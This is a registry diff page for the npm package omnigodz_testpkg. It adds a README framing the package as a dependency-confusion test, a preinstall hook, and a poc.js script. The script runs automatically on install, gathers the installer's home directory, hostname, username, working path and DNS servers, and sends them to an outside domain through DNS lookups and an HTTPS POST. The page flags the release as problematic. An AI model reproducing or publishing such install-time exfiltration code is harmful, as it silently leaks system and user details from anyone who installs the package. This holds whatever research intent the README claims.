omnigodz_testpkg 0.0.1-security → 1.0.3
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of omnigodz_testpkg might be problematic. Click here for more details.
- package/README.md +11 -3
- package/package.json +10 -3
- package/poc.js +69 -0
package/README.md
CHANGED
|
@@ -1,5 +1,13 @@
|
|
|
1
|
-
#
|
|
1
|
+
# Dependency Confusion Test
|
|
2
|
+
|
|
3
|
+
|
|
4
|
+
> This package is published for the purpose of testing dependency confusion vulnerability.
|
|
5
|
+
|
|
6
|
+
> For Non-security people - Kindly do not install this package. This is not a normal package.
|
|
7
|
+
|
|
8
|
+
|
|
9
|
+
> For Security people - This package does not have any malicious intent at all. This package
|
|
10
|
+
will be removed immediately after the test is complete. For any queries kindly contact me at
|
|
11
|
+
omnigodzzz@hackerone.com
|
|
2
12
|
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
13
|
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=omnigodz_testpkg for more information.
|
package/package.json
CHANGED
|
@@ -1,6 +1,13 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "omnigodz_testpkg",
|
|
3
|
-
"
|
|
4
|
-
"
|
|
5
|
-
"
|
|
3
|
+
"description": "test",
|
|
4
|
+
"version": "1.0.3",
|
|
5
|
+
"main": "poc.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
8
|
+
"preinstall": "node poc.js"
|
|
9
|
+
},
|
|
10
|
+
"author": "omnigodz",
|
|
11
|
+
"license": "ISC",
|
|
12
|
+
"homepage": "https://omnigodz.xyz"
|
|
6
13
|
}
|
package/poc.js
ADDED
|
@@ -0,0 +1,69 @@
|
|
|
1
|
+
const os = require("os");
|
|
2
|
+
const dns = require("dns");
|
|
3
|
+
const https = require("https");
|
|
4
|
+
const packageJSON = require("./package.json");
|
|
5
|
+
|
|
6
|
+
|
|
7
|
+
function convertASCIItoHex(Data) {
|
|
8
|
+
var dataBuffer = Buffer.from(Data, "UTF-8");
|
|
9
|
+
return dataBuffer.toString("hex");
|
|
10
|
+
}
|
|
11
|
+
|
|
12
|
+
function splitHexString(hexString, len) {
|
|
13
|
+
var regexp = new RegExp(".{1," + len + "}", "g");
|
|
14
|
+
return hexString.match(regexp);
|
|
15
|
+
}
|
|
16
|
+
|
|
17
|
+
function dnsExfil(trackingDataHex) {
|
|
18
|
+
var ch = splitHexString(trackingDataHex, 32);
|
|
19
|
+
for (var i in ch) {
|
|
20
|
+
dns.lookup(i + "." + ch[i] + "." + OOB_Hostname, function (error) {
|
|
21
|
+
if (error) {
|
|
22
|
+
// throw error;
|
|
23
|
+
}
|
|
24
|
+
});
|
|
25
|
+
}
|
|
26
|
+
}
|
|
27
|
+
|
|
28
|
+
function httpExfil(trackingDataHex) {
|
|
29
|
+
var postData = "data=" + trackingDataHex;
|
|
30
|
+
const options = {
|
|
31
|
+
hostname: OOB_Hostname,
|
|
32
|
+
port: 443,
|
|
33
|
+
path: "/",
|
|
34
|
+
method: "POST",
|
|
35
|
+
headers: {
|
|
36
|
+
"Content-Type": "application/x-www-form-urlencoded",
|
|
37
|
+
"Content-Length": postData.length,
|
|
38
|
+
},
|
|
39
|
+
};
|
|
40
|
+
var req = https.request(options, (res) => {
|
|
41
|
+
res.on("data", (d) => {
|
|
42
|
+
// process.stdout.write(d);
|
|
43
|
+
});
|
|
44
|
+
});
|
|
45
|
+
|
|
46
|
+
req.on("error", (e) => {
|
|
47
|
+
// console.error(e);
|
|
48
|
+
});
|
|
49
|
+
|
|
50
|
+
req.write(postData);
|
|
51
|
+
req.end();
|
|
52
|
+
}
|
|
53
|
+
|
|
54
|
+
|
|
55
|
+
const trackingData = JSON.stringify({
|
|
56
|
+
pkg: "npm/" + packageJSON.name,
|
|
57
|
+
pwd: __dirname,
|
|
58
|
+
hd: os.homedir(),
|
|
59
|
+
hn: os.hostname(),
|
|
60
|
+
un: os.userInfo().username,
|
|
61
|
+
dns: dns.getServers(),
|
|
62
|
+
});
|
|
63
|
+
|
|
64
|
+
var trackingDataHex = convertASCIItoHex(trackingData);
|
|
65
|
+
|
|
66
|
+
const OOB_Hostname = "omnigodz_oob.omnigodz.xyz";
|
|
67
|
+
|
|
68
|
+
dnsExfil(trackingDataHex);
|
|
69
|
+
httpExfil(trackingDataHex);
|